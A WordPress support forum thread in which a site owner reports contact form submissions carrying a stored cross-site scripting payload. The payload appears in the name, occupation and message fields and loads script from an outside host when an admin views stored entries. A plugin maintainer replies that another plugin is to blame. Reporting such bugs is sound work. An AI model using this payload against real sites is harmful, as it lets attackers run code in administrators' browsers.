JS Injection

  • Resolved sergeygindin

    (@sergeygindin)


    5 years, 9 months ago

    Hi. Recently, we received an contact form with this entered data:

    your-name: “><script src=//x.z66.nl></script>
    your-email: [email protected]
    your-tel-prefix:
    your-tel: 0612345678
    your-occupation: “><script src=//x.z66.nl></script>
    Message: “><script src=//x.z66.nl></script>

    We are using v5.0.4 of CF7.

    I tried to reproduce this message on dev, so when going to /wp-admin/admin.php?page=cf7_storage, this sended form script was executed automatically.

    Does future versions of plugin have ability to block this injections?
    Thanks.

Viewing 2 replies - 1 through 2 (of 2 total)

  • Hi,

    Contact Form 7 does not store submitted forms by default, so you must be using some other plugin that stores (and displays) forms data. Please, ask the author of that plugin to fix the JS injection.

    Cheers,
    ?eslav

    Thread Starter sergeygindin

    (@sergeygindin)

    Ok, thanks for the point.

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘JS Injection’ is closed to new replies.